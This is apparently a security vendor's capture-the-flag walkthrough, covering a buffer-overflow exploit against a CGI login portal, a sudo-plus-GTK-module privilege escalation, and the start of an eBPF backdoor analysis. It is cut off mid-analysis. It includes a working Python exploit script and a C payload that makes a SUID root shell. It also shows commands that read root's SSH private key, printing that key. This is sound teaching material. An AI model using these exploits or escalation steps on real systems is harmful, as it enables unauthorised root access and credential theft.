Adversary Quest Walkthrough, Part 3: Four PROTECTIVE PENGUIN Challenges

Picture1

At the end of January 2021, the CrowdStrike Intelligence Advanced Research Team hosted our first-ever Adversary Quest. This “capture the flag” event featured 12 information security challenges in three different tracks: eCrime, Hacktivism and Targeted Intrusion. In the third track, Targeted Intrusion, players were pitted against the fictional adversary PROTECTIVE PENGUIN. Their objective was described as follows:

An Antarctica-based APT with a counterintelligence mission. Born out of the necessity to protect their Antarctic colonies from discovery, sentient wildlife has acquired the technology and skill set that allows PROTECTIVE PENGUIN to target research institutes, cruise lines and satellite imagery providers.

Part 1 of this three-part blog series covered the challenges in the eCrime track. Part 2 of this three-part blog series covered the challenges in the hacktivism track. This blog, Part 3, provides a walkthrough of the four challenges in the Targeted Intrusion track: Portal, Dactyls Tule Box, Egg Hunt and Exfiltrat0r.

Challenge 1: Portal

The PROTECTIVE PENGUIN track started off with the following challenge:

PROTECTIVE PENGUIN gained access to one of their victims through the victim’s extranet authentication portals and we were asked to investigate.

In order to investigate how the actor was able to gain access, we get an archive with the portal binary and a URL for a running instance of the portal. The task is to analyze the code of the web application locally and to eventually exploit the application remotely. The code can be unpacked as follows:

$ tar zxvf authportal.tar.gz 
authportal/
authportal/cgi-bin/
authportal/cgi-bin/portal.cgi  # CGI binary that validates entered
                               # credentials
authportal/index.html          # HTML file that posts entered credentials to
                               # /cgi-bin/portal.cgi
authportal/creds.txt           # valid credentials for the portal
authportal/run.sh              # script that starts a Python-based web server

A first analysis shows that the Bash script run.sh starts a Python-based CGI web server that serves the current working directory and runs executable files inside the cgi-bin directory when requested. The HTML document index.html renders a form that takes a username and a password and sends the input via HTTP POST to /cgi-bin/portal.cgi. When observing the behavior of the portal, one can assume that the CGI binary portal.cgi (ELF x86-64) verifies the entered credentials against a list of valid credentials that is stored in creds.txt: If valid credentials from creds.txt are supplied, the flag CS{foobar} is displayed. Of course, that is just a dummy flag and the credentials from creds.txt do not work remotely. This leaves the player with one promising lead to follow: to reverse engineer and exploit the portal.cgi binary.

The main function at address 0x401434 can be analyzed easily with the help of a decompiler. The generated pseudocode reveals the following points:

  • The expected request method seems to be POST (which is consistent with how the JavaScript inside index.html interacts with portal.cgi).
  • The expected Content-Type seems to be application/json (also consistent with what we know from index.html).
  • The HTTP request body is expected to be a JSON object with the key/value pairs user and pass:
    {“user“: “entered username“, “pass“: “entered password“}
  • The function sub_401226 (which is called at address 0x40164A) takes two const char pointers as arguments that point to the values of user and pass. If the function returns 0, the CGI binary sends a JSON response that includes the flag (which will eventually get rendered by index.html). Otherwise, the JSON response is used to indicate an error.
  • The flag is retrieved from the environment variable FLAG.

The fact that the vulnerable binary is capable of printing the flag is a good indication that you likely do not need to execute your own code in order to complete this challenge. As a next step, the function sub_401226 (which was dubbed verify_creds) was decompiled for further analysis. The pseudocode is shown below:

__int64 __fastcall verify_creds(const char *username, const char *password)
{
  size_t tmp_strlen; // rax
  FILE *stream; // [rsp+10h] [rbp-230h]
  size_t strlen_candidate; // [rsp+18h] [rbp-228h]
  unsigned int creds_invalid; // [rsp+20h] [rbp-220h] OVERLAPPED BYREF
  char stored_creds_line[256]; // [rsp+24h] [rbp-21Ch] BYREF
  char input_creds_line[260]; // [rsp+124h] [rbp-11Ch] BYREF
  char *filename; // [rsp+228h] [rbp-18h]
  unsigned __int64 stack_cookie; // [rsp+238h] [rbp-8h]

  stack_cookie = __readfsqword(0x28u);
  memset(&creds_invalid, 0, 0x210uLL);
  creds_invalid = 1;
  filename = "creds.txt";
  __b64_pton(username, (u_char *)input_creds_line, 256uLL);
  *(_WORD *)&input_creds_line[strlen(input_creds_line)] = ':';
  tmp_strlen = strlen(input_creds_line);
  __b64_pton(password, (u_char *)&input_creds_line[tmp_strlen], 256uLL);
  stream = fopen(filename, "r");
  if ( !stream )
    return 0xFFFFFFFFLL;
  while ( fgets(stored_creds_line, 256, stream) )
  {
    strlen_candidate = strlen(stored_creds_line);
    if ( strchr(stored_creds_line, ':') )
    {
      if ( strlen_candidate )
      {
        if ( stored_creds_line[strlen_candidate - 1] == '\n' )
          stored_creds_line[strlen_candidate - 1] = 0;
      }
      if ( !strcmp(input_creds_line, stored_creds_line) )
      {
        creds_invalid = 0;
        break;
      }
    }
  }
  fclose(stream);
  return creds_invalid;
}

At the very beginning of the function, the stack variable char *filename is set to the address of the string creds.txt. This file stores a list of valid credentials. Next, the two arguments of the function, username and password, are Base64-decoded using the GNU C library function __b64_pton(). The decoded values are stored in the stack-allocated character array input_creds_line, separated by a colon (“:”), e.g., <decoded username>:<decoded password>. Afterward, fopen() is used to open the credential file. Each line of the file is then compared to the user-supplied credentials if it contains a colon. In case of a match, the function returns 0, signaling that the user supplied valid credentials. Otherwise, 1 is returned.

It was noticed that decoding the second parameter can overflow the stack-based buffer input_creds_line, which has a size of 260 bytes. During the first invocation of b64_pton(), when decoding the username, up to 256 bytes may be written. Subsequently, a colon (“:”) is appended, which increments the buffer utilization to 257 bytes in the worst case. Regardless of the space that is already used for storing the username and the colon, the second invocation of b64_pton() to decode the supplied password will then write up to 256 bytes beyond the colon. In other words, up to 253 bytes may get written beyond the designated target buffer input_creds_line (260 - 257 - 256 = -253).

Unfortunately, the function makes use of a stack cookie, and byte-wise brute forcing its 64-bit value is not an option either, as the target is not a forking server. Therefore, exploiting the program by overwriting the return address becomes infeasible.

Revisiting the stack layout of the function, it becomes clear that the filename pointer, which points to creds.txt, is adjacent to the end of the input_creds_line buffer. This would make a perfect target to be overwritten. In fact, it is the only reasonable target in our situation, as the filename pointer is located immediately before the stack cookie, which will result in program termination when overwritten. If we can overwrite the filename pointer, we can choose our own credentials file and thereby bypass authentication. But in order to do that, we need the address of a string that qualifies as a valid file path. Further, the file must exist and needs to contain a known value matching the expected <username>:<password> pattern. It is assumed that ASLR is enabled on the remote system so the only known address space are the loaded segments of the CGI binary itself, which was not compiled as a position-independent executable. When examining the strings contained in the binary, only one absolute file path is found. It is the path of the dynamic linker, /lib64/ld-linux-x86-64.so.2, which is located at address 0x4002A8. All other strings would be interpreted as files relative to the current working directory, and those are highly unlikely to exist.

When looking at the dynamic linker of an Ubuntu 20.04 installation, it becomes apparent that this file contains the required pattern numerous times. Most occurrences of the pattern are related to debug or error message format strings, such as the example below:

$ sha256sum /lib64/ld-linux-x86-64.so.2
96493303ba8ba364a8da6b77fbb9f04d0f170cbecbc6bbacca616161bd0f0008  /lib64/ld-linux-x86-64.so.2
$ xxd /lib64/ld-linux-x86-64.so.2 | grep 000257f0 -A 2
000257f0: 2f64 6c2d 7275 6e74 696d 652e 6300 0a63  /dl-runtime.c..c
00025800: 616c 6c69 6e67 2069 6e69 743a 2025 730a  alling init: %s.
00025810: 0a00 0a63 616c 6c69 6e67 2070 7265 696e  ...calling prein

The same format strings were identified in the dynamic linker binary that is shipped with Fedora 33. Thus, it was concluded that these strings are unlikely to change across distributions and that they likely exist on the target machine as well.

One last challenge that we need to address is the fact that we need to supply a “valid” combination of username and password from the dynamic linker, while at the same time we need to trigger the overflow. This can be accomplished by supplying the Base64-encoded counterparts of “calling init” and “ %s\x00<padding><address of dynamic linker>” as username and password. When the colon-separated credential line is prepared in memory, the second __b64_pton() invocation will overwrite the filename pointer with the address of the path to the dynamic linker. At the same time, the prepared credential line will be terminated early by the inserted null byte. Thus, the final strcmp(), which compares the prepared credential line against all candidates from the dynamic linker, will stop early as well, and the decoded bytes after the null byte will not be taken into account for the comparison. After the comparison succeeds, the CGI binary should send the flag as part of the HTTP response. The process was automated in a Python script:

$ ./portal-exploit.py https://authportal.challenges.adversary.zone:8880/
 {"status": "success", "flag": "CS{w3b_vPn_h4xx}"}

The script code is shown below:

#!/usr/bin/env python3

import argparse
from base64 import b64encode
import requests
import struct
from urllib.parse import urljoin

def p64(n):
    return struct.pack('<Q', n)

def pwn(baseurl):
    # LOAD:00000000004002A8 aLib64LdLinuxX8 db '/lib64/ld-linux-x86-64.so.2',0
    dyn_linker_addr = 0x4002a8

    username = b'calling init'
    password = bytearray()
    password.extend(b' %s\x00')
    # The buffer size/distance to *filename is 260 bytes. We subtract
    # - the size of the username,
    # - one byte for the colon and
    # - the size of the null-terminated password.
    # The difference is the size of the padding that is needed to
    # overwrite *filename.
    pad_size = 260 - len(username) - 1 - len(password)
    password.extend(b'A'*pad_size)
    password.extend(p64(dyn_linker_addr))

    username_enc = b64encode(username).decode()
    password_enc = b64encode(password).decode()

    creds = {
        'user': username_enc,
        'pass': password_enc,
    }
    s = requests.Session()
    url = urljoin(baseurl, '/cgi-bin/portal.cgi')
    r = s.post(url, json=creds)
    print(r, r.text)

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('url')
    args = parser.parse_args()
    pwn(args.url)

if __name__ == '__main__':
    main()

Challenge 2: Dactyls Tule Box

Challenge 2 is presented such that our fictional adversary PROTECTIVE PENGUIN compromised a company:

We just received another report that PROTECTIVE PENGUIN was identified at a company that provides access to mapping software as a service. The adversary allegedly elevated privileges and then moved laterally to a backup server.

We were provided with a Virtual Machine Image of the mapping service. Can you analyze the image and reproduce the attack? If you think you’ve got it, the victim let us stand up an exact replica of their environment so that you can validate your results:

You can SSH as user customer01 to maps-as-a-service.challenges.adversary.zone on port 4141 using the following SSH private key: 

-----BEGIN OPENSSH PRIVATE KEY-----
[...]
-----END OPENSSH PRIVATE KEY-----

In this challenge, we are supposed to reproduce an alleged privilege escalation. We are given a virtual machine image for analysis and SSH credentials for a remote system.

To start our analysis, we unpack the downloaded virtual machine image by using gzip -d adversary-quest-mapviewer.qcow2.gz and then set up a new VM in virt-manager  with the unpacked QCOW2 image as the hard drive. Next, we copy the SSH private key into a file called key and change the permissions to 600 so that read and write operations are limited to the user that owns the file. If the permissions are too wide, the OpenSSH client will refuse to use the file and instead urge the user to change permissions. Once our local VM is up and running, we can SSH into it for the first time:

$ ssh -i key -p 4141 customer01@192.168.122.189
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-62-generic x86_64)
[...]
customer01@maps-as-a-service:~$ uname -a
Linux maps-as-a-service 5.4.0-62-generic #70-Ubuntu SMP Tue Jan 12 12:45:47 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
customer01@maps-as-a-service:~$ cat /etc/os-release 
NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.1 LTS"
VERSION_ID="20.04"
[...]

Some initial reconnaissance suggests that this is an Ubuntu 20.04 LTS system running on a recently compiled kernel. While privilege escalation can happen in countless different ways, some types occur more often than others. The more frequent routes are the following:

  • Exploitation of a SUID/SGID binary
  • Exploitation of a binary you may execute through sudo
  • Privileged files being writable by unprivileged users
  • Exploitation of local services (e.g., loopback-bound or UNIX sockets)
  • Exploitation of the kernel

The hunt for SUID and SGID binaries did not yield any suspicious or custom binaries. All of them seem to be included in Ubuntu’s default repositories, and the challenge VM is pretty much up-to-date. It is unlikely that capture-the-flag players are supposed to find an undisclosed vulnerability in the stock SUID/SGID binaries. Note that the heap-based buffer overflow vulnerability in sudo (CVE-2021-3156) was still under embargo when the challenge was published.

Next, we take a look if there are any commands that sudo would let us execute as another user. To do so, we invoke sudo -ll, which prints the following:

customer01@maps-as-a-service:~$ sudo -ll
Matching Defaults entries for customer01 on maps-as-a-service:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User customer01 may run the following commands on maps-as-a-service:

Sudoers entry:
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	/usr/local/bin/mapviewer

This tells us that we are allowed to execute the binary /usr/local/bin/mapviewer via sudo as root without authentication. The fact that the binary resides below /usr/local is a strong indication that it is custom-made and does not originate from a default Ubuntu package. Furthermore, the name of the binary, mapviewer, aligns with the description of the challenge. When we try to start it, we see an error message that indicates that the connection to the X server has failed and that we therefore do not see a GUI.

customer01@maps-as-a-service:~$ sudo mapviewer
Unable to init server: Could not connect: Connection refused

(mapviewer:3026): Gtk-WARNING **: 14:14:13.802: cannot open display:

This confirms that we in fact have permission to run mapviewer as root. Furthermore, the error message tells us that the binary is GTK-based. If we can exploit this binary and make it run our own code, it would also get executed as root. Typical avenues for passing malicious input to a vulnerable program to exploit it include standard input (stdin), environment variables, command line arguments, sockets, malicious GUI interactions and shared library search order hijacking.

When inspecting the binary, it becomes apparent that the application links against osm-gps-map, a Gtk+ widget for displaying OpenStreetMap and Google Maps tiles. Most of the mapviewer code seems to originate from an example application with the same name that is provided by the osm-gps-map project. Such code overlaps greatly help reduce time-consuming reverse engineering efforts. We can see that mapviewer does not read input from stdin and that it does not contain any networking code. Therefore, we can rule out stdin and network sockets as ways for passing malicious input. From the env_reset flag in the sudo -ll output, we know that sudo will not allow us to pass a custom environment to mapviewer. This leaves us with shared object search order hijacking, malicious GUI interactions and malicious command-line arguments as possible attack vectors that we still need to check. One convenient way to gain visibility into the shared object search order is to use the tool strace on the target binary. By monitoring system calls related to file accesses, we should be able to spot a vulnerable search order easily. As we have a local copy of the VM, we can simply grant ourselves the right to execute strace as root for testing purposes by appending the line customer01 ALL=(ALL) NOPASSWD: ALL to the file /etc/sudoers.d/10-mapviewer. The following listing shows the invocation of mapviewer via strace:

customer01@maps-as-a-service:~$ sudo strace -e file mapviewer
execve("/usr/local/bin/mapviewer", ["mapviewer"], 0x7ffff7d34c20 /* 24 vars */) = 0
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/usr/local/lib/tls/haswell/x86_64/libgthread-2.0.so.0", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
[...]

Unfortunately, all attempts of accessing shared objects, successful or not, referenced file paths that are not writable by unprivileged users. This outcome is not much of a surprise, as by default Ubuntu 19.10 and newer do not preserve the HOME environment variable any more when using sudo. Thus, the likelihood of searching the unprivileged user’s home directory for shared objects while executing as root has been reduced.

In order to check for malicious GUI interactions, an X11-enabled SSH session to the local VM was established and mapviewer was started as an unprivileged user:

$ ssh -i key -p 4141 -X customer01@192.168.122.189
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-62-generic x86_64)
[...]
customer01@maps-as-a-service:~$ mapviewer
[...]

The user interface of mapviewer is shown in the following screenshot. Users can scroll the map, zoom in and out, and place marks on the map. Other than that, there does not appear to be any dangerous functionality implemented — an estimate that is also backed by our code analysis and reverse engineering efforts so far.

The last item on our list of potential attack vectors is malicious command-line arguments. mapviewer does not advertise any command-line arguments that would obviously present a security risk:

customer01@maps-as-a-service:~$ mapviewer --help
Usage:
  mapviewer [OPTION…] - Map browser

Options:
  -n, --no-cache            Disable cache
  -e, --editable-tracks     Make the tracks editable


Valid map sources:
	0:	None
	1:	OpenStreetMap I
[...]
	12:	Virtual Earth Hybrid

When compared to the mapviewer source code on GitHub, it becomes apparent that even several command-line options have been removed from the GitHub version. However, mapviewer is a GTK application. According to the GTK documentation, GTK applications implicitly accept a set of GTK-specific command-line arguments:

All GTK+ applications support a number of standard commandline options. These are removed from argv by gtk_init(). Modules may parse and remove further options. The X11 and Windows GDK backends parse some additional commandline options.

--gtk-module module. A list of modules to load in addition to those specified in the GTK3_MODULES environment variable and the gtk-modules setting.

The --gtk-module option looks particularly interesting as it should allow us to load our own malicious module in the privileged mapviewer process. At this point, we have two options: We can either read on GTK documentation and build a valid GTK module, or we can ignore the GTK-specific requirements for modules and take a shortcut. We took the shortcut, which, by coincidence, is even universally applicable to dynamically linked binaries: By marking our payload function with the constructor attribute, we can instruct the dynamic loader to execute our payload once it loads our library and before control flow is passed to any GTK-specific loader code. The following code implements our payload, which creates a root-owned SUID-enabled copy of bash as a simple way of persisting our root privileges.

#include 
#include 

__attribute__((constructor))
void pwn()
{
	char *argv[] = {
		"/bin/bash",
		"-p",
		"-c",
	        "cp /bin/bash /bin/bash2; chmod +s /bin/bash2",
		NULL
	};

	puts("Trying to create suid-enabled /bin/bash2...");
	execve("/bin/bash", argv, NULL);
}

The code can be compiled as follows:

$ gcc -shared -fPIC -o /tmp/pwn.so pwn.c

When executing mapviewer with --gtk-module option, we gain root privileges even before GTK has a chance to complain about a missing X11 connection or our module not adhering to GTK-specific module requirements:

customer01@maps-as-a-service:~$ sudo mapviewer --gtk-module /tmp/pwn.so
Trying to create suid-enabled /bin/bash2...
customer01@maps-as-a-service:~$ ls -la /bin/bash2
-rwsr-sr-x 1 root root 1183448 Mar 15 14:37 /bin/bash2
customer01@maps-as-a-service:~$ bash2 -p
bash2-5.0# id
uid=1001(customer01) gid=1001(customer01) euid=0(root) egid=0(root) groups=0(root),1001(customer01)

We can use these privileges to read the SSH private key of the root user and the corresponding known_hosts file:

bash2-5.0# cat /root/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAFLrooVaQm4+u+uB4sHmJTcMn0IFFW5ac8qo/yIlgJ6AAAAKCMRPvrjET7
6wAAAAtzc2gtZWQyNTUxOQAAACAFLrooVaQm4+u+uB4sHmJTcMn0IFFW5ac8qo/yIlgJ6A
AAAED7UEgIa0dLauEO+obZLKUO9DTvUrUZskHUawW1KF1wpAUuuihVpCbj6764HiweYlNw
yfQgUVblpzyqj/IiWAnoAAAAFnJvb3RAbWFwcy1hcy1hLXNlcnZpY2UBAgMEBQYH
-----END OPENSSH PRIVATE KEY-----
bash2-5.0# cat /root/.ssh/known_hosts 
maps-backups.challenges.adversary.zone ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAaIwWWA8y9cIT5MfnbJ0x91Smgi6Zzf7D56u4Hr94Qd/toffdAO3c5ajm7E7GjgBIQ4YVRTh28pRBuL7QCSnDo

From the known_hosts file, we learn that this machine had likely established an SSH connection to the host maps-backups.challenges.adversary.zone at least once in the past. With the newly obtained key downloaded and stored as id_ed25519_root, a connection to that host can be established successfully to retrieve the flag:

$ ssh -i id_ed25519_root backup@maps-backups.challenges.adversary.zone
[...]
CS{sudo_+_GTK_=_pwn}

Because of the security risks imposed by running GTK applications as root, GTK even prevents SUID- and SGID-enabled binaries from executing and terminates its own initialization, as shown below:

(process:50984): Gtk-WARNING **: 16:33:41.444: This process is currently running setuid or setgid.
This is not a supported use of GTK+. You must create a helper
program instead. For further details, see:

    http://www.gtk.org/setuid.html

Refusing to initialize GTK+.

As opposed to detecting a SUID or SGID context, detecting if a program was run via sudo is a much more involved task that cannot be accomplished easily. Thus, no warning or program termination occurs if GTK-linked programs such as mapviewer are run via sudo.

Challenge 3: Egg Hunt

The third challenge of the PROTECTIVE PENGUIN track is called “Egg Hunt.” The challenge description reads as follows:

After moving laterally, PROTECTIVE PENGUIN compromised a number of additional systems and gained persistence. We have identified another host in the DMZ that we believe was backdoored by the adversary and is used to regain access.

Please download a virtual machine image of that host and identify the backdoor. Validate your findings in our test environment on egghunt.challenges.adversary.zone.

The archive contains a shell script and a QCOW2 image, which can be unpacked as follows:

$ tar Jxvf egghunt.tar.xz 
egghunt/
egghunt/art_ctf_egghunt_local.qcow2
egghunt/run.sh

The shell script can be used to start a live snapshot of the VM and additionally forwards port 4422/tcp and 1337/udp from the host to the VM.

After starting the VM through the script, we are presented with an interactive shell. While looking for suspicious files, a shared object named libc.so.7 can be found in the directory /dev/shm/x86_64-linux-gnu:

root@egghunt:~# ls -la /dev/shm
total 0
drwxrwxrwt  3 root root   60 Jan 14 12:15 .
drwxr-xr-x 17 root root 3860 Jan 14 12:13 ..
drwxr-xr-x  2 root root   60 Jan 14 12:15 x86_64-linux-gnu
root@egghunt:~# ls -la /dev/shm/x86_64-linux-gnu/
total 252
drwxr-xr-x 2 root root     60 Jan 14 12:15 .
drwxrwxrwt 3 root root     60 Jan 14 12:15 ..
-rwxr-xr-x 1 root root 257416 Jan 14 12:15 libc.so.7
root@egghunt:~# file /dev/shm/x86_64-linux-gnu/libc.so.7
/dev/shm/x86_64-linux-gnu/libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped

/dev/shm is a temporary filesystem, and as such, its contents are not retained across reboots, which makes this a highly unusual and suspicious location to store a shared object file. Any application that requires the shared object in that directory would become inoperable after a reboot. Further, the dynamic linker of the vulnerable image does not even search for shared objects in /dev/shm/x86_64-linux-gnu. These observations further strengthen the assumption that this file is almost certainly not legitimate.

Executing lsof and grepping for the shared object’s name shows that it seems to be used by the cron process (pid 974):

root@egghunt:~# lsof | grep libc.so.7
cron       974       [...]  /dev/shm/x86_64-linux-gnu/libc.so.7

Further examination of cron’s environment variables shows that it has been injected into the process by using LD_PRELOAD:

root@egghunt:~# strings /proc/$(pidof cron)/environ
LD_PRELOAD=/dev/shm/x86_64-linux-gnu/libc.so.7
SHELL=/bin/bash
PWD=/root
LOGNAME=root
XDG_SESSION_TYPE=tty
[...]

Listing the dynamic symbols of the shared object reveals that many of them are prefixed with the string bpf_.

root@egghunt:~# nm -D /dev/shm/x86_64-linux-gnu/libc.so.7 
                 U access@@GLIBC_2.2.5
0000000000020d40 T bpf_btf_get_fd_by_id
0000000000020ba0 T bpf_btf_get_next_id
000000000001f240 T bpf_create_map
000000000001f470 T bpf_create_map_in_map
000000000001f310 T bpf_create_map_in_map_node
000000000001f2b0 T bpf_create_map_name
000000000001f1c0 T bpf_create_map_node
000000000001f050 T bpf_create_map_xattr
00000000000210c0 T bpf_enable_stats
0000000000020570 T bpf_iter_create
0000000000020150 T bpf_link_create
00000000000187a0 T bpf_link__destroy
[...]

These symbols indicate that the shared object leverages eBPF functionality in one way or another. This is further confirmed by the fact that the shared object contains lines of debug and error messages related to libbpf, a “library for loading eBPF programs and reading and manipulating eBPF objects from user-space:

root@egghunt:~# strings /dev/shm/x86_64-linux-gnu/libc.so.7 | grep libbpf
[...]
libbpf: prog '%s': relo #%d: target candidate search failed for [%d] %s %s: %ld
libbpf: prog '%s': relo #%d: error matching candidate #%d 
libbpf: prog '%s': relo #%d: %s candidate #%d 
libbpf: prog '%s': relo #%d: field offset ambiguity: %u != %u
libbpf: prog '%s': relo #%d: relocation decision ambiguity: %s %u != %s %u
libbpf: prog '%s': relo #%d: substituting insn #%d w/ invalid insn
libbpf: prog '%s': relo #%d: unexpected insn #%d (ALU/ALU64) value: got %u, exp %u -> %u
libbpf: prog '%s': relo #%d: patched insn #%d (ALU/ALU64) imm %u -> %u
libbpf: prog '%s': relo #%d: unexpected insn #%d (LDX/ST/STX) value: got %u, exp %u -> %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) value too big: %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) accesses field incorrectly. Make sure you are accessing pointers, unsigned integers, or fields of matching type and size.
libbpf: prog '%s': relo #%d: patched insn #%d (LDX/ST/STX) off %u -> %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) unexpected mem size: got %d, exp %u
libbpf: prog '%s': relo #%d: insn #%d (LDX/ST/STX) invalid new mem size: %u
libbpf: prog '%s': relo #%d: patched insn #%d (LDX/ST/STX) mem_sz %u -> %u
libbpf: prog '%s': relo #%d: insn #%d (LDIMM64) has unexpected form
[...]

Keeping in mind that the challenge description mentioned a backdoor, it can be concluded that the shared object might be responsible for initializing one or more eBPF programs for that purpose. In fact, as shown by the command bpftool perf, there are three eBPF programs installed that are associated with the cron process (pid 974):

root@egghunt:~# bpftool perf
pid 974  fd 9: prog_id 16  tracepoint  netif_receive_skb
pid 974  fd 10: prog_id 17  uprobe  filename /lib/x86_64-linux-gnu/libc.so.6  offset 1174224
pid 974  fd 11: prog_id 18  uretprobe  filename /lib/x86_64-linux-gnu/libc.so.6  offset 1174224

In the listing above, the program names are not shown. However, their names can be retrieved, for example by using the dump subcommand, which also prints the respective function signatures:

root@egghunt:~# bpftool prog dump xlated id 16 | head -n 1
int kprobe_netif_receive_skb(struct netif_receive_skb_args * args):
root@egghunt:~# bpftool prog dump xlated id 17 | head -n 1
int getspnam_r_entry(long long unsigned int * ctx):
root@egghunt:~# bpftool prog dump xlated id 18 | head -n 1
int getspnam_r_exit(long long unsigned int * ctx):

According to the documentation, the netif_receive_skb() function processes all network receive buffers. The Linux kernel offers an eBPF trace point in that function, that the first eBPF program is attached to. The two other programs are attached as uprobes (entry and return) to the libc function getspnam_r(), which is used to retrieve password entries from the shadow file. Placing those probes on the entry and exit of that function in addition to the tracepoint on netif_receive_skb are perfect ingredients for an eBPF-based backdoor: A working hypothesis would be that as soon as a magic network packet is detected via the tracepoint, the uprobes would tamper with a returned shadow password entry, thereby allowing to bypass authentication mechanisms relying on getspnam_r().

In the context of a suspected backdoor, this makes perfect sense. The eBPF instructions of the first program, which is presumably responsible for packet introspection, can be dumped as follows:

root@egghunt:~# bpftool prog dump xlated id 16
   0: (b7) r2 = 0
   1: (63) *(u32 *)(r10 -8) = r2
   2: (7b) *(u64 *)(r10 -16) = r2
   3: (7b) *(u64 *)(r10 -24) = r2
[...]
  29: (7b) *(u64 *)(r10 -232) = r2
  30: (7b) *(u64 *)(r10 -240) = r2
  31: (7b) *(u64 *)(r10 -248) = r2
  32: (7b) *(u64 *)(r10 -256) = r2
[...]

At the beginning, 252 bytes of memory are initialized with zero. At instruction 38, bpf_probe_read is used to copy struct sk_buff (224 bytes) pointed to by args->skbaddr (see previously shown tracepoint signature) into the newly initialized memory of the eBPF program. The destination pointer r1 is derived from r10 by subtracting the offset 256. The size of 224 bytes is stored in r2, and r3 points to the memory that is about to be copied.

33: (79) r3 = *(u64 *)(r1 +8)
  34: (bf) r6 = r10
  35: (07) r6 += -256
  36: (bf) r1 = r6
  37: (b7) r2 = 224
  38: (85) call bpf_probe_read_compat#-54752

Similarly, bpf_probe_read_compat is called at instructions 48 and 69 to copy the IP header (20 bytes) and the UDP header (8 bytes) to eBPF memory, respectively. The resulting memory layout of the eBPF program can be illustrated as follows:

Offset relative to

r10 / bytes

Size / bytes Linux Data Structure
- 256 224 struct sk_buff
- 32 8 struct udphdr
- 24 20 struct iphdr

The copied headers are then parsed and certain fields are checked to ensure that the backdoor is activated only by a magic packet. By analyzing the corresponding code of each check, it is possible to compile a list of conditions that the magic packet must meet. If any of the checks are not met, the program jumps to an early exit.

Condition Explanation
iphdr.version: IPv4 50: (bf) r1 = r10
51: (07) r1 += -24
52: (71) r1 = *(u8 *)(r1 +0)
53: (57) r1 &= 240
54: (55) if r1 != 0x40 goto pc+236

These instructions parse the version field of struct iphdr. The IP version must be 4.
iphdr.protocol: UDP 55: (bf) r1 = r10
56: (07) r1 += -24
57: (71) r1 = *(u8 *)(r1 +9)
58: (55) if r1 != 0x11 goto pc+232

These instructions parse the protocol field of struct iphdr. The protocol must be UDP.
iphdr.ihl: 5 (20 bytes) 59: (bf) r1 = r10
60: (07) r1 += -24
61: (71) r1 = *(u8 *)(r1 +0)
62: (57) r1 &= 15
63: (55) if r1 != 0x5 goto pc+227

These instructions parse the IP header length field (ihl) of struct iphdr. The IP header length must be 5×32-bit words (20 bytes).
udphdr.dest: 1337 71: (bf) r1 = r10
72: (07) r1 += -32
73: (69) r1 = *(u16 *)(r1 +2)
74: (55) if r1 != 0x3905 goto pc+216

These instructions parse the UDP header destination port field of struct udphdr. The destination port must be 1337 (0x3905 in little endian byte order).
udphdr.len: 42 75: (bf) r1 = r10
76: (07) r1 += -32
77: (69) r1 = *(u16 *)(r1 +4)
78: (55) if r1 != 0x2a00 goto pc+212

These instructions parse the len field of struct udphdr. The length must be 42 bytes (0x2a00 in little endian byte order). Subtracting the size of the UDP header (8 bytes), this leaves 34 bytes for a payload.

After parsing the IP and UDP headers, the eBPF program processes the UDP packet’s payload. First, the 34-byte payload is copied into the eBPF memory. The destination buffer is located relative to r10 with an offset of -296 bytes:

86: (bf) r1 = r10
  87: (07) r1 += -296
  88: (b7) r2 = 34
  89: (bf) r3 = r6
  90: (85) call bpf_probe_read_compat#-54752

An updated eBPF memory layout looks like this:

Offset relative to

r10 / bytes

Size / bytes (Linux) Data Structure
- 296 34 UDP payload
- 262 6 unused/alignment
- 256 224 struct sk_buff
- 32 8 struct udphdr
- 24 20 struct iphdr

Afterward, the first three bytes of the buffer are validated:

91: (71) r1 = *(u8 *)(r10 -296)
  92: (55) if r1 != 0x66 goto pc+198
  93: (71) r1 = *(u8 *)(r10 -295)
  94: (55) if r1 != 0x73 goto pc+196
  95: (71) r1 = *(u8 *)(r10 -294)
  96: (55) if r1 != 0x66 goto pc+194

The first bytes of the payload must be \x66\x73\x66, which correspond to the ASCII characters fsf. If the required pattern is found, the first three bytes are overwritten with $1$ (which is also the result of the XORing fsf byte-wise with the value 66):

97: (b7) r1 = 36
  98: (73) *(u8 *)(r10 -294) = r1
  99: (b7) r1 = 12580
 100: (6b) *(u16 *)(r10 -296) = r1

The remaining 31 bytes of the buffer are each XORed byte-wise with a fixed value of 66:

101: (71) r1 = *(u8 *)(r10 -293)
 102: (a7) r1 ^= 66
 103: (73) *(u8 *)(r10 -293) = r1
 104: (71) r1 = *(u8 *)(r10 -292)
 105: (a7) r1 ^= 66
 106: (73) *(u8 *)(r10 -292) = r1
[...]
 191: (71) r1 = *(u8 *)(r10 -263)
 192: (a7) r1 ^= 66
 193: (73) *(u8 *)(r10 -263) = r1

Next, the eBPF program copies the buffer resulting from the XOR operations to memory that belongs to the eBPF map with id=4. Instead of reading and writing the buffer byte-wise, the program uses what looks like an inlined and branchless version of memcpy. This is nothing unusual, though, as the eBPF verifier does not allow back edges/loops. While it reads unsigned 64-bit values into a temporary register, each byte is written to the mapped memory individually. This approach requires bit shifting on the temporary register to maintain the original byte order within the destination buffer.

